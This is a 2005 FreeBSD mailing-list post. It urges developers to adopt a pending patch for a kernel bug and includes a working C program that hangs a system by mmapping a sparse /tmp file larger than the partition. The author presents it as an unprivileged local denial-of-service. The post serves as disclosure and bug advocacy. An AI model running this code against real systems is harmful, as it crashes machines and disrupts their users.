Today I happened to read this message on freebsd-stable: http://lists.freebsd.org/pipermail/freebsd-stable/2005-October/019086.html After I read all messages and related links, I feel so frustrating, why nobody take serious to fix this bug even we have a patch for it? I can repeat this bug on 7.0-CURRENT and 6.0-RC1 easily as a normal user! System goes no response so I have to power cycle it. The patch made by Uwe Doering actually works well. This bug looks like a security hole to me:( If you guys don't like this patch, please give out a reason and come out a better patch or solution. For impatience, you can run this to crush your system(7.x, 6.x, 5.x), you have to increase FILELEN to a size greater than your /tmp partition: =============================================== #include <stdio.h> #include <fcntl.h> #include <unistd.h> #include <err.h> #include <sys/types.h> #include <sys/mman.h> #define FILENAME "/tmp/test" /* where to put the test file */ #define FILELEN 710 /* test file length in MB */ main() { int fd; size_t len; char *buf, *p, *lim; len = FILELEN * 1024 * 1024; if ((fd = open(FILENAME, O_RDWR|O_CREAT|O_TRUNC, 0666)) == -1) err(2, "open() failed"); if (ftruncate(fd, len) == -1) err(2, "ftruncate() failed"); buf = mmap(NULL, len, PROT_WRITE, MAP_SHARED, fd, 0); if (buf == MAP_FAILED) err(2, "mmap() failed"); (void)close(fd); for (p = buf, lim = p + len; p < lim; p += 4096) *p = '0'; if (munmap(buf, len) == -1) err(2, "munmap() failed"); exit(0); } =============================================================== Cai, QuanqingReceived on Mon Oct 31 2005 - 09:59:58 UTC
This archive was generated by hypermail 2.4.0 : Wed May 19 2021 - 11:38:46 UTC